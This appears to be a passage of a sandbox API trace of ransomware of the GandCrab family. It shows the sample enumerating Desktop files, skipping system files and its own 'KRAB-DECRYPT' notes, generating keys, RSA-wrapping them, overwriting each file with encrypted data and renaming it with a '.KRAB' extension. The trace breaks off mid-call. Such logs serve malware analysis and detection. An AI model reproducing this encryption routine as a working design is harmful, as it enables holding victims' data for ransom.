CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0086.814] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1022ff8) returned 1 [0086.814] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.814] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.815] GetLastError () returned 0x0 [0086.815] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.815] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.815] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011700) returned 1 [0086.816] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0086.816] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.817] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.817] GetLastError () returned 0x0 [0086.817] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.817] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.817] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\jyfobg_oihllue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.818] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.818] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.818] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x14bb, lpOverlapped=0x0) returned 1 [0086.832] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffeb45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.832] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x14bb, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x14bb, lpOverlapped=0x0) returned 1 [0086.832] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.833] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.837] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.837] CloseHandle (hObject=0x43c) returned 1 [0086.839] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.839] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\jyfobg_oihllue.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\jyfObg_oIhlLUe.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\jyfobg_oihllue.jpg.krab")) returned 1 [0086.842] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.899] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.899] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0086.899] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0086.899] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\KRAB-DECRYPT.txt" [0086.899] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.899] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\KRAB-DECRYPT.txt.KRAB") returned 78 [0086.899] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\KRAB-DECRYPT.txt") returned 73 [0086.899] lstrlenW (lpString=".txt") returned 4 [0086.899] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.900] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0086.900] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.900] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\KRAB-DECRYPT.txt") returned 73 [0086.900] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\KRAB-DECRYPT.txt") returned 73 [0086.900] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.900] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.900] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0086.900] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.900] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.900] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.900] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0086.901] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0086.901] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0086.901] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0086.901] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.901] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.901] lstrcmpW (lpString1="PZUF k2P.flv", lpString2=".") returned 1 [0086.901] lstrcmpW (lpString1="PZUF k2P.flv", lpString2="..") returned 1 [0086.901] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="PZUF k2P.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv" [0086.901] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.901] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv.KRAB") returned 74 [0086.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv") returned 69 [0086.901] lstrlenW (lpString=".flv") returned 4 [0086.902] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.902] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0086.902] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.902] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv") returned 69 [0086.902] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv") returned 69 [0086.902] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="desktop.ini") returned 1 [0086.902] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="autorun.inf") returned 1 [0086.902] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="ntuser.dat") returned 1 [0086.902] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="iconcache.db") returned 1 [0086.902] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="bootsect.bak") returned 1 [0086.902] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="boot.ini") returned 1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="ntuser.dat.log") returned 1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="thumbs.db") returned -1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="ntldr") returned 1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="NTDETECT.COM") returned 1 [0086.903] lstrcmpiW (lpString1="PZUF k2P.flv", lpString2="Bootfont.bin") returned 1 [0086.903] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.903] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010820) returned 1 [0086.905] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.905] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.905] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.906] CryptGenRandom (in: hProv=0x1010820, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.906] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0086.906] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.906] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0086.907] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.908] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.908] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.908] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.908] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0086.908] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.909] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011458) returned 1 [0086.910] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10230f8) returned 1 [0086.910] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.910] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.910] GetLastError () returned 0x0 [0086.910] CryptDestroyKey (hKey=0x10230f8) returned 1 [0086.910] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0086.911] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0086.912] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1022ff8) returned 1 [0086.912] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.912] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.912] GetLastError () returned 0x0 [0086.912] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.913] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0086.913] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\pzuf k2p.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.913] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.913] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.914] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xa1f2, lpOverlapped=0x0) returned 1 [0086.927] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff5e0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.927] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa1f2, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xa1f2, lpOverlapped=0x0) returned 1 [0086.928] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.928] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.932] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.932] CloseHandle (hObject=0x43c) returned 1 [0086.933] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.933] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\pzuf k2p.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\PZUF k2P.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\pzuf k2p.flv.krab")) returned 1 [0086.935] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.935] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.936] lstrcmpW (lpString1="SJX2sCK2M.gif", lpString2=".") returned 1 [0086.936] lstrcmpW (lpString1="SJX2sCK2M.gif", lpString2="..") returned 1 [0086.936] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\", lpString2="SJX2sCK2M.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif" [0086.936] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.936] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif.KRAB") returned 75 [0086.936] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif") returned 70 [0086.936] lstrlenW (lpString=".gif") returned 4 [0086.936] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.936] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0086.937] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.937] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif") returned 70 [0086.937] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif") returned 70 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="desktop.ini") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="autorun.inf") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="ntuser.dat") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="iconcache.db") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="bootsect.bak") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="boot.ini") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="ntuser.dat.log") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="thumbs.db") returned -1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.937] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.938] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="ntldr") returned 1 [0086.938] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="NTDETECT.COM") returned 1 [0086.938] lstrcmpiW (lpString1="SJX2sCK2M.gif", lpString2="Bootfont.bin") returned 1 [0086.938] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.938] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0086.939] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.940] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.940] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.940] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0086.940] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.940] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.940] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010ce8) returned 1 [0086.942] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.942] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.943] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.943] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0086.943] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0086.943] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.943] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011238) returned 1 [0086.944] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0086.945] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.945] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.945] GetLastError () returned 0x0 [0086.945] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.945] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0086.945] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011700) returned 1 [0086.947] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10230f8) returned 1 [0086.947] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0086.947] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0086.947] GetLastError () returned 0x0 [0086.947] CryptDestroyKey (hKey=0x10230f8) returned 1 [0086.947] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.947] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\sjx2sck2m.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0086.948] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.948] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.948] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xf1c5, lpOverlapped=0x0) returned 1 [0086.966] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff0e3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.966] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xf1c5, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xf1c5, lpOverlapped=0x0) returned 1 [0086.967] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0086.967] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.972] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.972] CloseHandle (hObject=0x43c) returned 1 [0086.973] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.974] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\sjx2sck2m.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\wH1O8nYfPk\\SJX2sCK2M.gif.KRAB" (normalized: 